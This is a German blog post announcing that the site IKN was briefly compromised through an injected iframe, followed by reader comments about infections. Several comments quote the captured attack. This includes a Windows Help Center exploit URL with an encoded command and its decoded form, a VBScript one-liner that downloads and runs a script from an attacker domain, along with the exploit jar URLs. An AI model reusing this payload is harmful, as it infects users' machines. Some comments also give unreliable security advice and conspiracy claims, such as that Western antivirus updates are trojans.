Gehackt
Hi, wer in den letzten 2-3 Stunden auf IKN unterwegs war möge doch bitte (sofern er denn unter Windows unterwegs ist und seinen Webbrowser nicht mit NoScript oder ähnlichem schützt) den Virenscanner aktualisieren und drüber laufen lassen. Tatsächlich wurde IKN für ein paar Minuten „gehackt“, d.h. ein Angreifer hat es geschafft ein iFrame ins Layout einzubauen. Schuld ist schätzungsweise (wir tüfteln das noch aus) WordPress.
Wir bitten die evtl. entstandenen Unannehmlichkeiten zu entschuldigen. Derartige Angriffe sind bei uns an der Tagesordnung, und irgendwann musste ja mal einer durchkommen. grtz, anx
57 Responses to Gehackt
Schreibe einen Kommentar
Du musst angemeldet sein, um einen Kommentar abzugeben.
Abwehrmassnahmen von Lüsen und Schaben auf dem PC Flur:
Erstens man nutze eifrigst ein Linux Derivat wie Ubuntu oder SuSELinux oder LinuxMint etc. pp. statt CIA ßpfel und Redmont Talks with FBI.
Dann nutze man Opera und nicht Multiple Sklerose Internet Explorer und nicht den Mac CIA Internet Explorer.
Leider ist FireFox nicht mehr sicher! Bereits mehrfach gebohrt. Die Pflege hat nachgelassen.
So das von meiner Seite, grüße aus der Unix Welt.
also gut das ich noch so einen roten regenschirm unten in der task leiste habe. 😉
OT: Schweres Erdbeben in Mexiko der Stärke 7,9!
http://www.echo-online.de/nachrichten/schlaglichter/Erdbeben-Mexiko;art112,2728366
Ein schweres Erdbeben der Stärke 7,9 hat am Dienstag die Pazifikküste von Mexiko erschüttert. Dies teilte die US-Erdbebenwarte (USGS) mit.
Ein langes, schweres Erdbeben hat am Dienstagabend (MEZ) die mexikanische Hauptstadt Mexiko-Stadt erschüttert.
Es hatte nach Angaben de US-Erdbebenwarte eine Stärke von 7,9. Das Zentrum lag in rund zehn Kilometern Tiefe im südmexikanischen Staat Guerrero.
Auch in der Hauptstadt Mexiko-Stadt schwankten Gebäude. Beschäftigte rannten aus ihren Büros, Anwohner verließen in Panik ihre Wohnungen. Der Bürgermeister der Hauptstadt, Marcello Ebrard, twitterte: ß?Wir haben ein Erdbebenß?.
Menschen liefen auf die Straße. Hochhäuser schwankten, wie ein dpa-Reporter berichtete. Hubschrauber kreisten über der Hauptstadt.
http://www.welt.de/vermischtes/weltgeschehen/article13933381/Erdbeben-der-Staerke-7-9-erschuettert-Mexiko-Stadt.html
Vorsorge – Selbversorgen, für Städter ohne Balkon:
die hängenden Fenstergärten zum selbermachen:
http://www.youtube.com/watch?v=-8shuvMGIvc&feature=player_embedded
da bin ich falsch gelandet wollte zu offtopid, sorry
Das Mini-X Betriebssystem hat jetzt nicht nur die EU-Unterstützung von ca. 3 Mio. kurz vor der Embedded in Nürnberg bekommen, sondern hat auch die erste Runde im GSoC (Google Summer of Code) bestanden.
Ist jetzt ein bisschen Stress bei „den Anglikanern“, weil ihnen das gar nicht gefällt zumal Mini-X konkret darauf zielt
+ eine hohe Transparenz und Standardisierung auch bzgl. des IT-Wissenstandes über ganz Europa zu schaffen
+ eine sehr grundlegende für alle IT-Spezialisten noch nachvollziehbare Basis zu werden auf die sich alle als Mindestvoraussetzungen einigen können
+ eine Unabhängigkeit zur US-Vorherrschaft zu werden
+ zunehmend die Chance bekommt so wie die Programmiersprache Ada und Hardware im US-Militär, von Regierungen in Zukunft für Ausschreibungen herangezogen zu werden
+ Maschinenhersteller EU-nationenübergreifend eine EU-standardkonforme Lösung zu bieten.
+ durch den universitären Hintergrund die Sache einfach deutlich weniger chaotisch ist als viele andere OpenSource Projekte und das Potential hat so auch strukturierter zu bleiben
usw.
Die Anglikaner meinen, dass so ein Lobbyismus von EU und Regierungsseite nicht erfolgsversprechend sei. Ich habe mich gewundert was für eine „Wut über die E.U. oder U.E.“ (wie sie schreiben) existiert. In dem Moment musste ich mich schon sehr wundern? Wenn wir das gegen die EU haben, das ist ja eine Sache, aber warum diese Wut von der anderen Seite von der ich das gar nicht erwartet habe. Was haben wir den USA angetan oder warum sind die so wütend auf uns? Hat die anglikanische Propaganda es geschafft Hass auf uns zu schüren wir wären an der Weltwirtschaftskrise schuld? Also das hat mich dann doch schon sehr gewundert und die Diskussion rund um die Mini-X Unterstützung war dann quasi bei ihnen wie der Deckel auf dem dampfenden Topf.
Kann mir mal jemand der die Lage hier besser versteht erklären warum die auf uns Europäer so stinkig sind. Ok, die führen wohl einen Wirtschaftskrieg gegen uns, aber das geht ja schon inzwischen ins emotionale? Die Resonanz die ich so registriert habe, die kam mir doch vor wie die Reaktion Polen gegen die Russen, recht schlecht drauf, feindschaftliche Tendenz, aber irgendwie dennoch zu feige es offen zu sagen …
Die Amis haben einige Wirtschaftliche Probleme und die werden noch Gift und Galle spucken bis nach Europa.
Ihre dingsbums Papiere glaube ich Pfandpapiere oder Anleihepapiere werden sie in Zukunft vielleicht nicht mehr so schnell los.
Kein Kredit mehr für die Amis,oh wie kreuslich. 😉
Auf was hat der Hacker zugegriffen ?
Was gibt es hinterm Vorhang, was nicht auch online ist?
Ich hatte auch einen Eindruck von Konkurrenzdenken den ich früher nicht so wahrgenommen habe. Könnte sein, die wollen auf keinen Fall, dass die EU mehr zusammen rückt. Die wollen eine zerstrittene gespaltene EU, so habe ich den Eindruck gehabt. Dann kommt man da mit einem EU-Gemeinschaftsprojekt und da flippen die Amis und Engländer aus. Die USA & Engländer wollen keine autonome und keine starke EU, so muss man das wohl verstehen. Mit einem Verlust der nationalen Identität oder Kultur wie wir das hier bei uns in Europa verstehen, hat diese EU-Ablehnung von abroad nichts zu tun. Deren Ablehnung ist eine klare Absage an Autonomie und Stärke. Quasi: Sie, „unsere Freunde“ wollen anscheinend keinen 2. neben sich haben!?
So iss es.
bleib standhaft cheffe,
die können den „sand im meer“ nicht leerschaufeln.
wir sind schon zuviele!
ps:
für alle fälle,wenn du mal ne neue seite aufmachen musst,
wie sollen wir vorgehen,um ik wieder zu finden?!
Hallo Jens
eine frage dazu :
gestern kamen Mails , die ich an gmail,yahoo.de, t- online und freenet versandte immer zurueck mit dem Vermerk : ihre mails wurde abgelehnt weil moeglicherweise ein virus bei ihnen ist .
Ich habe nun mehrere accounts, und bei allen passierte das gleiche .
Was ich aber nicht verstehe, das es innerhalb Spaniens ,Amerika und Asien problemlos ging .
Mein Virenprogramm zeigt aber nichts an, sagt , das alles in Ordnung ist .
Ich habe dann jemanden gebeten, an die deutschen Emails ebenfalls zu senden, und der hatte das gleiche Problem, alle Mails kamen mit der Virenwarnung zurueck .
Ich schliesse einmal aus, wobei er auch auf deiner Seite war, das es etwas damit zu tun hat .
Die emails von besagten Deutschen, kamen aber problemlos hier an .
Gruss
helga
@chris321
ich halte das für „reverse psychology“ – im gegenteil: die EU ist eine Erfindung Washingtons.
see : http://www.mmnews.de/index.php/politik/9735-von-der-udssr-zur-eudssr-und-nwo
wenn er einen iFrame platziert hat, muss er übern secure port als admin rein.
Das ganze Surfen entwickelt sich immer mehr zum Eiertanz. Cookies ein/aus löschen. Script ein/aus , Flash usf.
Im nächsten Schritt dann proxies, IPHeader change, zu einem gemieteten v-server über SSH tunneln …
sternenstaub: manche free-v-scannner erkennen eben nicht alles was an müll rüberkommt. versuch mal spy-boot und dann win-update zu machen. vieleicht erübrigt sich dann so mancher mist von selbst.
Lieber Rock on Silver :
mein Pc ist wie mein Auto, ich mache an , und fahre bzw schreibe los .Bis windows up date konnte ich Dir nun folgen, aber was ist ein Spy Bootß?Liest sich jetzt gerade fuer mich wie ein Agenten Schiff ?!
Ich haenge dir mal an, was mir da als mail delivery aus deutschland immer zurueck kommt(hier von t online, aber die anderen waren gleichlautend (das erschien demjenigen , der dann auch mal probierte auch ) :
_Die_Annahme_Ihrer_Nachricht_wurde_abgelehnt,_da_sie_als_Spam_oder/550-5.7.0_Virus_eingestuft_wurde._Sollten_Sie_dies_als_unzutreffend_ansehen,/550-5.7.0_senden_Sie_bitte_obige_Fehlercodes_an_FPR@RX.T-ONLINE.DE,_damit_wir/550-5.7.0_die_Klassifizierung_untersuchen_k__nnen._Wir_entschuldigen_uns_f__r/550_5.7.0_etwaige_Unannehmlichkeiten_und_bedanken_uns_f__r_Ihre_Unterst__tung!/
deinen virenscanner bitte NICHT als malware-scanner verwenden – taugt nix! Nimm spybot – arbeitet mit z.B. AntiVir(free) SUPER zusammen! Dann guck ste mal weiter… 🙂
http://www.safer-networking.org/de/index.html
und win-updates bitte nicht vergessen.
oder du machst es so wie frank mit dem pinguin
Hallo rock
er analysiert gerade ,also der spybot, danke fuer den link .das windowsupdate, macht das bei mir automatisch, er zeigte mir an ,das er heute morgen schon ein update gemacht hat .
Jetzt habe ich frank gesucht wegen dem pinguin .
damit ist ja linux gemeint.
ich habe nun windows 7, kann ich denn den linux einfach drueber laden ? oder muss ich den formatieren ?
Virenscanner geht voll ab
Trojaner auf IK News ßß?
16,45 Uhr
Habe mit zwei tools gecheckt und nichts gefunden, hab es aber weitergeleitet.
http://forum.chip.de/redirect-to/?redirect=http%3A%2F%2Flinkscanner.explabs.com%2Flinkscanner%2Fdefault.aspx
http://safeweb.norton.com/report/show?url=http%3A%2F%2Fwww.iknews.de
Welchen Scanner beutzt du?
No Script hat auch wieder was gefunden:
Adresse ist:
h t t p://ceryaaget.in/index.php?tp=89c9473171a1c848
wieder unten links auf der Seite ein Java-Applet
Kaspersky
Meldet laufenend Trojaner
Selben wie bei Wobi
hcp://services/search?query=anything&topic=hcp://system/sysinfo/sysinfomain.htm%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A..%5C..%5Csysinfomain.htm%u003fsvr=eval(Run(String.fromCharCode(99,109,100,32,47,99,32,101,99,104,111,32,66,61,34,108,46,118,98,115,34,58,87,105,116,104,32,67,114,101,97,116,101,79,98,106,101,99,116,40,34,77,83,88,77,76,50,46,88,77,76,72,84,84,80,34,41,58,46,111,112,101,110,32,34,71,69,84,34,44,34,104,116,116,112,58,47,47,99,101,114,121,97,97,103,101,116,46,105,110,47,99,111,110,116,101,110,116,47,104,99,112,95,118,98,115,46,112,104,112,63,102,61,55,102,50,52,49,38,100,61,49,34,44,102,97,108,115,101,58,46,115,101,110,100,40,41,58,83,101,116,32,65,32,61,32,67,114,101,97,116,101,79,98,106,101,99,116,40,34,83,99,114,105,112,116,105,110,103,46,70,105,108,101,83,121,115,116,101,109,79,98,106,101,99,116,34,41,58,83,101,116,32,68,61,65,46,67,114,101,97,116,101,84,101,120,116,70,105,108,101,40,65,46,71,101,116,83,112,101,99,105,97,108,70,111,108,100,101,114,40,50,41,32,43,32,34,92,34,32,43,32,66,41,58,68,46,87,114,105,116,101,76,105,110,101,32,46,114,101,115,112,111,110,115,101,84,101,120,116,58,69,110,100,32,87,105,116,104,58,68,46,67,108,111,115,101,58,67,114,101,97,116,101,79,98,106,101,99,116,40,34,87,83,99,114,105,112,116,46,83,104,101,108,108,34,41,46,82,117,110,32,65,46,71,101,116,83,112,101,99,105,97,108,70,111,108,100,101,114,40,50,41,32,43,32,34,92,34,32,43,32,66,32,62,32,37,84,69,77,80,37,92,92,108,46,118,98,115,32,38,38,32,37,84,69,77,80,37,92,92,108,46,118,98,115,32,38,38,32,116,97,115,107,107,105,108,108,32,47,70,32,47,73,77,32,104,101,108,112,99,116,114,46,101,120,101)));
und so was soll ich als programm jetzt zulassen?
besser ist du hast noch so einen älteren 2. rechner für linux. dann kommen sich die systeme im dual-boot nicht in die quere. den älteren rechner bekommst du inzwischen schon unter 100ß?. und für linux brauchst du auch nicht so viel rechnerleistung wie für das win.
oder: da du schon auf win7 umbestiegen bist, dann wartest du das win8 ab. da soll dan noch viel mehr linux im win drin sein.
Also ich bin hier, wer noch?
also ich bin auch noch nicht down.
mal sehn wer hier das bessere system am laufen hat (hehe)
Falls es hilft…heute 17h:
Beim Zugriff auf Daten der URL „http://ceryaaget.in/content/sp30.jar“
wurde ein Virus oder unerwünschtes Programm ‚EXP/2010-0094.AK‘ [exploit] gefunden.
Durchgeführte Aktion: Der Zugriff auf die Datei wurde blockiert
Hallo Rock
einen 2. rechner hab ich noch, nun habe ich den spy checken lassen und der der hat einiges gefunden, als ich das entfernen wollte , kam die meldung, das er das nicht machen koennte, weil das mein system schaedigen wuerde .
irgendwas mit win .ii. so irgendwas .
ratlos bin ich jetzt alle mal .
lg
helga
bei mir machts keine probleme mehr, hab mit dem malewarescanner den troyaner exp… auch entdeckt,
bei witerer recherche gelesen das das ein javaproblem ist hab dann java runtergeschmissen, neuste version geladen rechner runtergefahren, wieder hoch, dann hats nochmal gepipst, rechner wieder aus, jetzt zwei stunden später keine reaktion von antivir mehr, hoffe ich werde jetzt nicht total überwacht, ach ja werden wir ja eh schon,
muss schnell kochen,
bis gleich
Dann treten wir mal diesen Trojanerschweinen in den After die Stiefelspitzen rein.
Band Zeitlos. „Gegen den Strom“
http://www.youtube.com/watch?v=BFNfbPOtEEY
Band Zeitlos. „Die Büchse der Pandorra“
http://www.youtube.com/watch?v=CiIgdiRSgFg
Hört das ganze Album der Band an! Ein Must Have. Danke.
lass die systemrelevante 😉 datei zuerst mal noch drinn, die ist eh schon ins system rein und wirst so leicht nicht los.
versuchs mal zuerst mit http://www.hijackthis.de/de um überhaupt zu wissen was an deinem system so rumläuft.
oder du googlest nach deiner win.ii dann findest du massig anleitungen ob und wie du den trojaner wieder los wirst.
evtl. musst du den trojaner im F8 win-abgesicherten modus entfernen.
wünsche dir viel erfolg dabei.
Zeitlos. IllumiNazi http://www.youtube.com/watch?v=rHWHEXnCS0E
und dass ich es nicht vergesse, für deinen 2.rechner
http://www.zdnet.de/magazin/41554287/open-source-statt-windows-die-besten-linux-varianten.htm
werd ich machen, sehr interessant. danke für den tip
Zeitlos. Zweite Chance. Klasse Band, das ist TEXT und kommt von einer aufgeweckten Jugend.
http://www.youtube.com/watch?v=HgRigO40hpA
@ frank zu zeitlos…
@anju. Naja, ER ist schon immer zeitlos IN gewesen…ok?^^
Das Album wurde heute hochgeladen. Und ich fall prompt drüber, hab ganz was anderes gesucht.
*Er gibt Seele und Geist, wie Herz und Verstand*
Einem Scanner aus Deutschland oder USA/England/Israel würde ich nie wieder installieren.
Die schicken selbst die Viren los, damit Du den update machst. Um bei gelegenheit nach Schlüsselwörtern zu suchen. Der Update ist schon der Trojaner.
Nee, nehmt den rising antivbir und firewall, emailscan usw. aus China. Niedlicher Löwe, wenn der was findet macht er shopsui draus.
Sind alle umsonst, denke nur der internet security kostet.
http://www.rising-global.com/Download/Home-Home-Office/Rising-Internet-Security-2011.html
Und mal aufräumen mit wise cleaner, die unteren 3 sind umsonst.
http://wisecleaner.com/download.html
Dieser regcleaner ist auch gut, wenn auch schon älter.2007 lezter update.
Nach Installation Sprache auswählen.
und dann nur tools verwenden>>> clean REG all
(nie die Hardware zurücksetzen!)
http://regcleaner.en.softonic.com/download
Unten über dem blauen Strich der kleine alternativ link.
Wenn Du wissen willst, was alles auf dem PC läuft, nimm autoruns.
Da kann man leicht ein Häkchen entfernen und wenn dann was nicht geht, setzt Du es neu.
rechtsklick bringt dich sofort ins Internet und erklärt dir um was es sich handelt.
Sehr gutes tool, eins der besten.
http://www.filehippo.com/download_autoruns/download/4034ff917b7a1c86058c9618fa4d1ba5/
Wer Firefox hat, das Icon firefox.exe von Programme in neuen Ordner kopieren und umbenennen in , denk Dir was aus. So wird der nicht sofort erkannt.
Firefox 4x so schnell machen:
about:config
scroll down bis ; network.http.pipelining.maxrequest (von 4 auf 16 setzen)
der link dadrüber : network.http.pipelining (von false auf true setzen) browser schliessen.
Habe noch 3 wichtige andere gute tunes für die config.
Mit rechtsclick neu einfügen über integer und auf 500000setzen.
content.notify.interval;500000
+ den Boolean auf true:content.notify.ontimer;true
wer die anderen haben will muss bescheid sagen.
Ich noch mal :
heute bekam ich eine Serie an emails von den deutschen Kontakten :
das Problem war auch innerhalb Deutschlands, oder ist es noch , das scheint nicht nur ein HackProblem von IKN zu sein, sondern irgendetwas mit den deutschen Emailanbietern .
Die kamen wohl mit dem Nachlesen der Mails in der Vorratsdatenspeicherung nicht mehr nach 🙂
bedrohung wurde blockiert
feuerfuchs und avg
migrateras.in/index.php?tp=89c9473171a1c848
seltsam, kommentare funktionieren, rest siehe oben… hatte ich noch nie
dann poste doch direkt die übersetzung :>
cmd /c echo B=“l.vbs“:With CreateObject(„MSXML2.XMLHTTP“):.open „GET“,“http://ceryaaget.in/content/hcp_vbs.php?f=7f241&d=1″,false:.send():Set A = CreateObject(„Scripting.FileSystemObject“):Set D=A.CreateTextFile(A.GetSpecialFolder(2) + „\“ + B):D.WriteLine .responseText:End With:D.Close:CreateObject(„WScript.Shell“).Run A.GetSpecialFolder(2) + „\“ + B > %TEMP%\\l.vbs && %TEMP%\\l.vbs && taskkill /F /IM helpctr.exe
pfui wa?
In den letzten Tagen scheint sich eh irgendwas mit dem Web abzuspielen. Etliche Leute berichten von Problemen und lags beim normalen Surfen etc.